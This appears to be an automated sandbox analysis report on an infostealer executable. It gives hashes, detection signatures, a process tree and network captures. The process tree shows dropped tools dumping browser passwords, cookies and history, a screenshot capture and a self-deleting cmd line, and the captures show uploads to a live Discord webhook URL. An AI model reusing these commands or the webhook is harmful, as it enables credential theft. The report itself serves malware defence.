Analysis

  • max time kernel
    359s
  • max time network
    360s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240611-en, locale:en-us, os:windows7-x64, system
  • submitted
    03/07/2024, 19:54 UTC

General

  • Target

    g3ttroll1ed.exe

  • Size

    4.5MB

  • MD5

    33241a3aadf06404014353cfe3a47bac

  • SHA1

    a0bcbb2e7fde364d8f997b95303cd0c3b2e6b9fb

  • SHA256

    05e06e0f9ea0b245aff5f7aadeb69cce15e162effd29b4eec21bac3418ed414b

  • SHA512

    38e72ba8a3876b6d02606183ef671a566a1ce17f4d4923a4ca8a785b60b7240a0c7e29622dea05d3df176ef316a2712a59eba11d37234b4c34aab64dc98c773d

  • SSDEEP

    98304:/Qf3s64R9ybzUcwti78OqJ7TPBF3ZlHHgkWJ0P39qXSaDv:OzUcwti7TQlF3ZxxWJSUnDv

Score
9/10

Malware Config

Signatures

  • NirSoft WebBrowserPassView 4 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 9 IoCs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\g3ttroll1ed.exe
    "C:\Users\Admin\AppData\Local\Temp\g3ttroll1ed.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe
      "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs60mxdU+lA2BbnUyqaxTaH4Jr31I/RkZECDvIySFqYbrtzscpDOyatJnxFkkqCDIcWouirC6gPXky74iFLNUGrji+iiHogYYHxmZt2qGHNUOVLDC/ED+Aoofqy96tUDWx8=
      2⤵
      • Executes dropped EXE
      • Modifies system certificate store
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1720
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c compile.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2796
          • C:\Users\Admin\AppData\Local\Temp\bfsvc.exe
            C:\Users\Admin\AppData\Local\Temp\bfsvc.exe /capture /Filename "C:\Users\Admin\AppData\Local\Temp\capture.png"
            5⤵
            • Executes dropped EXE
            PID:3068
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1104
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c compile.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2180
          • C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe
            C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:3024
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:592
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c compile.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2416
          • C:\Users\Admin\AppData\Local\Temp\winhlp32.exe
            C:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"
            5⤵
            • Executes dropped EXE
            PID:1936
          • C:\Users\Admin\AppData\Local\Temp\splwow64.exe
            C:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"
            5⤵
            • Executes dropped EXE
            PID:1772
          • C:\Users\Admin\AppData\Local\Temp\hh.exe
            C:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:620
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1668
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c compile.bat
          4⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1176
          • C:\Users\Admin\AppData\Local\Temp\xwizard.exe
            C:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:3032
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"
        3⤵
          PID:2104
          • C:\Windows\SysWOW64\choice.exe
            choice /C Y /N /D Y /T 3
            4⤵
              PID:2004

      Network

      • US
        DNS
        ipecho.net
        RtkBtManServ.exe
        Remote address:
        8.8.8.8:53
        Request
        ipecho.net
        IN A
        Response
        ipecho.net
        IN A
        34.117.118.44
      • US
        GET
        https://ipecho.net/plain
        RtkBtManServ.exe
        Remote address:
        34.117.118.44:443
        Request
        GET /plain HTTP/1.1
        Host: ipecho.net
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        date: Wed, 03 Jul 2024 19:56:02 GMT
        content-type: text/plain; charset=utf-8
        Content-Length: 14
        access-control-allow-origin: *
        via: 1.1 google
        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      • US
        DNS
        discord.com
        RtkBtManServ.exe
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.137.232
        discord.com
        IN A
        162.159.138.232
        discord.com
        IN A
        162.159.136.232
        discord.com
        IN A
        162.159.135.232
        discord.com
        IN A
        162.159.128.233
      • US
        GET
        https://discord.com/api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        GET /api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc HTTP/1.1
        accept-encoding: gzip, deflate
        accept: */*
        user-agent: DiscordBot (https://github.com/RogueException/Discord.Net, v2.3.1)
        X-RateLimit-Precision: second
        Host: discord.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 19:56:04 GMT
        Content-Type: application/json
        Transfer-Encoding: chunked
        Connection: keep-alive
        set-cookie: __dcfduid=47af6170397611efbf087eaed2f33127; Expires=Mon, 02-Jul-2029 19:56:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036565
        x-ratelimit-reset-after: 1
        Content-Encoding: gzip
        vary: Accept-Encoding
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qh9sZr7fmU8nFYRvPd7YbvCDymVgCUbI67ONgMVrr9k%2FS4wCMlBtoL%2BKF2jo5sY5VfmskHbF3FD0gxBWfFjuaFBHgbPXpbh1WVbxKMcs%2F4KY6%2B3Xq3a5hyZVh5od"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=47af6170397611efbf087eaed2f331270acf872cd13fff11ecb28f7bbc13507e2714c4af9827463779c8b401ae4e97ef; Expires=Mon, 02-Jul-2029 19:56:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=47aa84c0a1feac8be5f047b79f1b4fba4b87605b-1720036564; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=Zuo2rfF7p1ZkqQ0PcsFZE6TV5ENqWlPG6hIbgnLWxi0-1720036564382-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d96fce7c40bee4-LHR
      • US
        POST
        https://discord.com/api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc?wait=true
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc?wait=true HTTP/1.1
        accept-encoding: gzip, deflate
        accept: */*
        user-agent: DiscordBot (https://github.com/RogueException/Discord.Net, v2.3.1)
        X-RateLimit-Precision: second
        Content-Type: application/json; charset=utf-8
        Host: discord.com
        Content-Length: 520
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Date: Wed, 03 Jul 2024 19:56:05 GMT
        Content-Type: application/json
        Transfer-Encoding: chunked
        Connection: keep-alive
        set-cookie: __dcfduid=482b7b7a397611efb98ff60d84dba40f; Expires=Mon, 02-Jul-2029 19:56:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036566
        x-ratelimit-reset-after: 1
        Content-Encoding: gzip
        vary: Accept-Encoding
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Hj2hKiBuLhpQrogGfjQlKmprT7fV9AaBEES1eykyg4E%2FS2FcyoGOvbpeaqYKYbfO8WAhhGFg%2FY1j4js0kuM4jAOmsH4n%2FeSkIZ78xaj0TP%2FtI3W3YFRMHrS1t9B"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=482b7b7a397611efb98ff60d84dba40f762ab5729c5c51938a87cc7a6da2cdcd0329c9d9b90112a908c68c4c9b7d237b; Expires=Mon, 02-Jul-2029 19:56:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=a7155535eb7a71d360e6889177a250d519b96dfc-1720036565; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=_tPICxlZgC_T0QSvQLhuluXjDqT8PZGtmIAn6Arb0Ww-1720036565198-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d96fd0ee97bee4-LHR
      • US
        POST
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc HTTP/1.1
        Content-Type: multipart/form-data; boundary="1a0443dd-804d-4acc-a8ab-e7f02a9c9c4c"
        Host: discord.com
        Content-Length: 368431
        Expect: 100-continue
        Response
        HTTP/1.1 400 Bad Request
        Date: Wed, 03 Jul 2024 19:56:05 GMT
        Content-Type: application/json
        Content-Length: 80
        Connection: keep-alive
        set-cookie: __dcfduid=483f5ec4397611ef9f0416be8cfb3c76; Expires=Mon, 02-Jul-2029 19:56:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036566
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6GfJFoZGbCJnCrXFoFJf%2FTfC1st1GgO5QnXh7zNxGXLHTdPMzjb2SnicOD4%2F2YCrzrvoyTTUq2xVJx1IHN%2Fvqp%2BPiK2upW%2B4ZrkjouxZwoXXIktx%2BSikwccz2iR"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=483f5ec4397611ef9f0416be8cfb3c76fdb4c4820028e06f53ec0967a8b231aa8c9af25ebe90e2150c1890ced727b25c; Expires=Mon, 02-Jul-2029 19:56:05 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=188c066c3647d4a57708bc395e37a04013e75430-1720036565; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=oH3zDmHFBQS64dlYtahqxl_zvF0Q5tMXU3uFnB5PJrs-1720036565326-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d96fd23a2c23fb-LHR
      • US
        POST
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc HTTP/1.1
        Content-Type: multipart/form-data; boundary="4ea13809-d8c9-42cc-bc8d-127405d9fecd"
        Host: discord.com
        Content-Length: 455
        Expect: 100-continue
        Response
        HTTP/1.1 400 Bad Request
        Date: Wed, 03 Jul 2024 19:56:08 GMT
        Content-Type: application/json
        Content-Length: 80
        Connection: keep-alive
        set-cookie: __dcfduid=49da900a397611efbaa8a25183378f37; Expires=Mon, 02-Jul-2029 19:56:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036569
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KRIZ3WtjRzgvJMjdLYdwfJGiWg%2FETJ6ioA1LeMmQYzFcB2orvxucRSAE0WC1fmtCFVGcoMELcOq7Hv3XOgkptLFu9N7vxoo3ZiLFBoj%2BnDrfTmNapNdOllXPOfdv"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=49da900a397611efbaa8a25183378f3754e3c6de08b2a801a24a671ee34d3e7f6ca78cb969c3129e152ee752dc66f6e2; Expires=Mon, 02-Jul-2029 19:56:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=eeb6cabf9f63ef119045574109bc4618299bdd41-1720036568; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=2Cjuya6jPiwm0eM75Lswon3ET3Hw0xBNmy.LNkUFhWw-1720036568026-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d96fe4985363b4-LHR
      • US
        POST
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc HTTP/1.1
        Content-Type: multipart/form-data; boundary="db8839ba-acd1-48ed-90b9-a4393cb5ca3a"
        Host: discord.com
        Content-Length: 462
        Expect: 100-continue
        Response
        HTTP/1.1 400 Bad Request
        Date: Wed, 03 Jul 2024 19:56:13 GMT
        Content-Type: application/json
        Content-Length: 80
        Connection: keep-alive
        set-cookie: __dcfduid=4d2fd044397611ef8e06a67e1ed0292d; Expires=Mon, 02-Jul-2029 19:56:13 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036574
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WUTtW4CL846XuyUq5DoLGzuFjHGPi3q9qYN7LADcMHUt1IQz6fvTBl3XLy%2F4P%2F29wh%2BidmZW%2FEv6yphdL2VeuOVvWvfmR7zkw2BmJN%2F%2B5lNMzj1ebrfYiwm35bF0"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=4d2fd044397611ef8e06a67e1ed0292d5596eda44e5431f536baa5bf47fbb5c7a3148a1d94f3e80642b3472bd3c25d01; Expires=Mon, 02-Jul-2029 19:56:13 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=5bdeecd79c70443ed1c40ba2295bda964af918ae-1720036573; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=n2NCQUJojVbVgasCr0dNgYZO4LcBR0CdsT6UcNlX01E-1720036573620-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d97007594d63b5-LHR
      • US
        POST
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc HTTP/1.1
        Content-Type: multipart/form-data; boundary="9c256634-4335-44c8-8781-0cfc3eec09cf"
        Host: discord.com
        Content-Length: 461
        Expect: 100-continue
        Response
        HTTP/1.1 400 Bad Request
        Date: Wed, 03 Jul 2024 19:56:17 GMT
        Content-Type: application/json
        Content-Length: 80
        Connection: keep-alive
        set-cookie: __dcfduid=4f448b36397611ef8ad682e6eaa6f85b; Expires=Mon, 02-Jul-2029 19:56:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036578
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BsBSSh%2F7tmaHZwOZLCFvEor9tu%2BD79CVPPbq3WPMvaq4r24%2Be8zOgdU7M2sSeAYVw8YMdbjHPMvzcNc%2F5qiTfW6TLSPkEgvffNUn6ElP8ey%2F7PM9PpxCscCLHO5a"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=4f448b36397611ef8ad682e6eaa6f85bd81531477ff65d7bec5f790ff17e2c75941cd19b48d009a79e5f728e40b86bb5; Expires=Mon, 02-Jul-2029 19:56:17 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=3dee9a72b4209fb25db71067c1fda23a023db7cf-1720036577; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=xugm9ROKIK0G5gX2RL8UYGulecNtuKywfJhuIbEdEdU-1720036577109-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d9701d286971e0-LHR
      • US
        POST
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        RtkBtManServ.exe
        Remote address:
        162.159.137.232:443
        Request
        POST /api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc HTTP/1.1
        Content-Type: multipart/form-data; boundary="21385098-574b-41a5-8157-486d3e580635"
        Host: discord.com
        Content-Length: 461
        Expect: 100-continue
        Response
        HTTP/1.1 400 Bad Request
        Date: Wed, 03 Jul 2024 19:56:18 GMT
        Content-Type: application/json
        Content-Length: 80
        Connection: keep-alive
        set-cookie: __dcfduid=4fff6988397611efb9a72a3190fcf511; Expires=Mon, 02-Jul-2029 19:56:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        strict-transport-security: max-age=31536000; includeSubDomains; preload
        x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
        x-ratelimit-limit: 5
        x-ratelimit-remaining: 4
        x-ratelimit-reset: 1720036579
        x-ratelimit-reset-after: 1
        via: 1.1 google
        alt-svc: h3=":443"; ma=86400
        CF-Cache-Status: DYNAMIC
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CKTzLVuvAND3P3URk56oAT0HkEKLZJIRLuLs728yCK4E3eGmdkDKxexk%2FHIUn5SKgbc0Wo%2B9tIKoRdpWIlHRLn6omdJh7Klzo2Nbhe2BssvxoMi1OML70RZ3Q5Ul"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        X-Content-Type-Options: nosniff
        Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
        Set-Cookie: __sdcfduid=4fff6988397611efb9a72a3190fcf5112bfaa8efb7e8bbea6523da6687784909bce23395445f5f6d1738635b9df13536; Expires=Mon, 02-Jul-2029 19:56:18 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
        Set-Cookie: __cfruid=ff5eaac4af45193d4984f65a7a6b71b5da34e700-1720036578; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Set-Cookie: _cfuvid=DZveBxOUvBvHV5DZ_yiJhrdAt96hVuE3RKkoqGGEKGA-1720036578331-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
        Server: cloudflare
        CF-RAY: 89d970250c4c88bc-LHR
      • 34.117.118.44:443
        https://ipecho.net/plain
        tls, http
        RtkBtManServ.exe
        775 B
        3.9kB
        8
        8

        HTTP Request

        GET https://ipecho.net/plain

        HTTP Response

        200
      • 162.159.137.232:443
        https://discord.com/api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc?wait=true
        tls, http
        RtkBtManServ.exe
        2.3kB
        7.7kB
        15
        18

        HTTP Request

        GET https://discord.com/api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc

        HTTP Response

        200

        HTTP Request

        POST https://discord.com/api/v6/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc?wait=true

        HTTP Response

        200
      • 162.159.137.232:443
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        tls, http
        RtkBtManServ.exe
        381.4kB
        10.1kB
        288
        142

        HTTP Request

        POST https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc

        HTTP Response

        400
      • 162.159.137.232:443
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        tls, http
        RtkBtManServ.exe
        1.7kB
        4.8kB
        11
        11

        HTTP Request

        POST https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc

        HTTP Response

        400
      • 162.159.137.232:443
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        tls, http
        RtkBtManServ.exe
        1.6kB
        2.3kB
        9
        9

        HTTP Request

        POST https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc

        HTTP Response

        400
      • 162.159.137.232:443
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        tls, http
        RtkBtManServ.exe
        1.7kB
        4.8kB
        11
        11

        HTTP Request

        POST https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc

        HTTP Response

        400
      • 162.159.137.232:443
        https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc
        tls, http
        RtkBtManServ.exe
        1.7kB
        4.8kB
        11
        11

        HTTP Request

        POST https://discord.com/api/webhooks/1000846044172664912/8v4_gnMLyVTmwUTIytbmMxSRd3bIxV8rlvRGpWiqfotqki7mbc8DQOUk1WCkc6zHCDmc

        HTTP Response

        400
      • 8.8.8.8:53
        ipecho.net
        dns
        RtkBtManServ.exe
        56 B
        72 B
        1
        1

        DNS Request

        ipecho.net

        DNS Response

        34.117.118.44

      • 8.8.8.8:53
        discord.com
        dns
        RtkBtManServ.exe
        57 B
        137 B
        1
        1

        DNS Request

        discord.com

        DNS Response

        162.159.137.232
        162.159.138.232
        162.159.136.232
        162.159.135.232
        162.159.128.233

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt

        Filesize

        2B

        MD5

        f3b25701fe362ec84616a93a45ce9998

        SHA1

        d62636d8caec13f04e28442a0a6fa1afeb024bbb

        SHA256

        b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

        SHA512

